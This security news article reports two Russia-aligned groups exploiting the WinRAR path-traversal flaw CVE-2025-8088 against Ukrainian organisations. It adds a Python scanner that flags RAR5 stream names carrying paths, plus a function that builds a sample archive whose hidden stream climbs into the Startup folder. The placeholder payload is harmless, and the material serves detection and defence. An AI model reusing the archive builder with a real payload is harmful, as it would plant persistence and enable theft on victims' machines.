Russia-aligned groups exploit WinRAR flaw in Ukraine
Two Russia-aligned campaigns used a patched WinRAR path‑traversal bug (CVE‑2025‑8088) to install browser credential and document stealers on Ukrainian networks.
Trend Micro researchers reported that two Russia-aligned cyber groups continued exploiting a patched WinRAR path‑traversal vulnerability to target Ukrainian organisations nearly a year after the vendor released fixes.
The flaw, tracked as CVE‑2025‑8088 and fixed in WinRAR 7.13 in July 2025, lets a crafted archive write files outside the folder the user chose for extraction. It abuses NTFS Alternate Data Streams (ADS): the archive stores a payload as a stream attached to a decoy file, and because vulnerable WinRAR builds did not sanitise the stream name, a name containing ..\ sequences is honoured as a relative path and the payload lands in any directory the user can write to. Because the payloads are stored as stream entries rather than ordinary files, the archive appears to contain only the decoy, which is why the technique slips past a casual inspection. On an endpoint, dir /r or PowerShell's Get-Item -Stream * reveals streams attached to extracted files.
One cluster, tracked as SHADOW‑EARTH‑066 (also referenced as UAC‑0226), shifted from Excel macro droppers to crafted RAR archives. Each archive contains a visible decoy PDF and several hidden ADS payloads whose stored paths point outside the extraction directory. A Windows shortcut (LNK) file dropped into the user's Startup folder runs at the next login and launches cmd.exe, which spawns a PowerShell loader. The loader maps an updated GIFTEDCROOK DLL, named result.dll, into memory and runs it from there. GIFTEDCROOK harvests saved passwords and cookies from Chromium‑based browsers and Firefox and copies documents with targeted extensions. Once the data has been sent to the remote servers, the operators delete the malicious files to limit forensic traces.
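To make the archive-level mechanism described above concrete, here is an added example, not Trend Micro's or RARLAB's code, that walks the RAR5 block headers of an archive without depending on unrar, pulls out each file name and the stream name stored in every "STM" service record, and flags any stream name that carries a path separator or a ..\ component, which is what a CVE‑2025‑8088 archive needs and what a genuine NTFS stream name never contains. The sample archive is constructed in code: the decoy name Resume.pdf, the Startup-folder stream path and the placeholder shortcut bytes are illustrative assumptions, not indicators from the report, and the scanner handles the RAR5 format only.

```python
# Added example, not Trend Micro's or RARLAB's code: walks RAR5 block headers without unrar and
# flags ADS stream names that carry a path (the CVE-2025-8088 pattern). Sample archive, decoy
# name and Startup-folder stream path are constructed illustrations, not indicators from the report.
import struct
import zlib
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"
HEAD_MAIN, HEAD_FILE, HEAD_SERVICE, HEAD_END = 1, 2, 3, 5
HFL_EXTRA, HFL_DATA = 0x01, 0x02  # header flags: extra area / data area present
FFL_TIME, FFL_CRC = 0x02, 0x04    # file flags: mtime / data CRC32 field present
EXTRA_SUBDATA = 7                 # extra record type carrying service data (the ADS name)

def read_vint(buf, pos):
    """RAR5 vint: 7 payload bits per byte, LSB first, high bit means another byte follows."""
    value = shift = 0
    while buf[pos] & 0x80:
        value |= (buf[pos] & 0x7F) << shift
        shift, pos = shift + 7, pos + 1
    return value | (buf[pos] << shift), pos + 1

def parse_headers(data):
    """Yield (type, name, stream_name) for every file and service block in the archive."""
    assert data.startswith(RAR5_SIG), "not a RAR5 archive"
    pos = len(RAR5_SIG)
    while pos < len(data):
        head_size, p = read_vint(data, pos + 4)      # each block starts with 4 bytes of header CRC32
        body_end = p + head_size
        htype, p = read_vint(data, p)
        hflags, p = read_vint(data, p)
        extra_size, p = read_vint(data, p) if hflags & HFL_EXTRA else (0, p)
        data_size, p = read_vint(data, p) if hflags & HFL_DATA else (0, p)
        if htype in (HEAD_FILE, HEAD_SERVICE):
            fflags, p = read_vint(data, p)
            p = read_vint(data, read_vint(data, p)[1])[1]   # skip unpacked size, attributes
            p += (4 if fflags & FFL_TIME else 0) + (4 if fflags & FFL_CRC else 0)
            p = read_vint(data, read_vint(data, p)[1])[1]   # skip compression info, host OS
            name_len, p = read_vint(data, p)
            name = data[p:p + name_len].decode("utf-8", "replace")
            stream, p = None, body_end - extra_size      # the extra area closes the header
            while p < body_end:                           # each record: size, type, payload
                rec_size, p = read_vint(data, p)
                rec_end = p + rec_size
                rec_type, p = read_vint(data, p)
                if rec_type == EXTRA_SUBDATA:
                    stream = data[p:rec_end].decode("utf-8", "replace")
                p = rec_end
            yield htype, name, stream
        pos = body_end + data_size
        if htype == HEAD_END:
            break

def has_traversal(path):
    """Absolute path, drive-letter path, or any '..' component with either separator."""
    return path[:1] in ("/", "\\") or path[1:2] == ":" or ".." in path.replace("\\", "/").split("/")

def suspicious_entries(data):
    """Return [(effective write path, reason)] for entries that would escape the extraction dir."""
    findings, host = [], None
    for htype, name, stream in parse_headers(data):
        if htype == HEAD_FILE:
            host = name
            if has_traversal(name):
                findings.append((name, "file name escapes extraction directory"))
        elif htype == HEAD_SERVICE and name == "STM" and stream:
            # ADS is written to <host file><stream name>; a genuine stream name never holds a separator
            if "\\" in stream or "/" in stream or has_traversal(stream):
                findings.append((host + stream, "ADS name carries a path (CVE-2025-8088 pattern)"))
    return findings

def _vint(n):
    out = bytearray()
    while n > 0x7F:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    return bytes(out + bytes([n]))

def _block(htype, body, extra=b"", payload=b""):
    # One block: CRC32 | header size | type | flags | [extra size] [data size] | body | extra | data
    flags = (HFL_EXTRA if extra else 0) | (HFL_DATA if payload else 0)
    fields = _vint(htype) + _vint(flags) + (_vint(len(extra)) if extra else b"")
    fields += (_vint(len(payload)) if payload else b"") + body + extra
    sized = _vint(len(fields)) + fields
    return struct.pack("<I", zlib.crc32(sized)) + sized + payload

def _file_body(name, payload):
    # file flags (data CRC32 present), unpacked size, attributes, data CRC32, compression, host OS, name
    return (_vint(FFL_CRC) + _vint(len(payload)) + _vint(0x20) + struct.pack("<I", zlib.crc32(payload))
            + _vint(0) + _vint(0) + _vint(len(name)) + name.encode())

# Assumed illustration of the traversal: climb out of the extraction folder into the Startup folder.
EVIL_STREAM = ":" + "..\\" * 4 + "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.lnk"

def build_sample_archive(stream_name=EVIL_STREAM):
    decoy, lnk = b"%PDF-1.4 decoy", b"L\x00\x00\x00 placeholder"   # constructed stand-ins, stored uncompressed
    subdata = _vint(EXTRA_SUBDATA) + stream_name.encode()
    return (RAR5_SIG + _block(HEAD_MAIN, _vint(0))                  # archive flags = 0
            + _block(HEAD_FILE, _file_body("Resume.pdf", decoy), payload=decoy)
            + _block(HEAD_SERVICE, _file_body("STM", lnk), extra=_vint(len(subdata)) + subdata, payload=lnk)
            + _block(HEAD_END, _vint(0)))                            # end-of-archive flags = 0
```

Running suspicious_entries over the constructed archive returns one finding, the ADS entry whose effective path is Resume.pdf followed by the traversal, and none for a benign stream such as :Zone.Identifier; on a real sample the same function takes the archive bytes read from disk. The parser checks only the header layout, not the header CRCs, so a truncated archive raises an IndexError rather than a parse error.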
Trend Micro analysts observed that the SHADOW‑EARTH‑066 operators moved from exfiltrating through Telegram to dedicated command‑and‑control servers, a change that coincides with the nationwide Telegram block introduced earlier in February.
The second actor, Earth Dahu (also known as Gamaredon), incorporated CVE‑2025‑8088 into campaigns aimed at long‑term access. Its chain begins with a GammaPhish HTML Application (HTA) that retrieves a VBScript downloader, GammaLoad, which in turn delivers modules such as GammaSteel, an information stealer that can monitor file changes in real time. Internal RAR timestamps and file naming conventions indicate the chain was active through at least April 10, 2026.
Trend Micro researchers Hiroyuki Kakara and Feike Hacquebord wrote that the findings illustrate “how unmanaged software keeps an exploited entry point open long after the fix ships.” They added that WinRAR remains widely used across Ukrainian organisations, making unpatched instances attractive targets for exploitation.
Both campaigns relied on the same patched vulnerability and used ADS, LNK shortcuts and PowerShell to achieve persistence and payload execution. The activity shows how a known vulnerability keeps paying off against organisations that have not fully updated or inventoried their software. WinRAR does not update itself, so the fix reaches an endpoint only when someone installs the new build; the practical check is to inventory installed WinRAR versions and confirm each is at or above 7.13.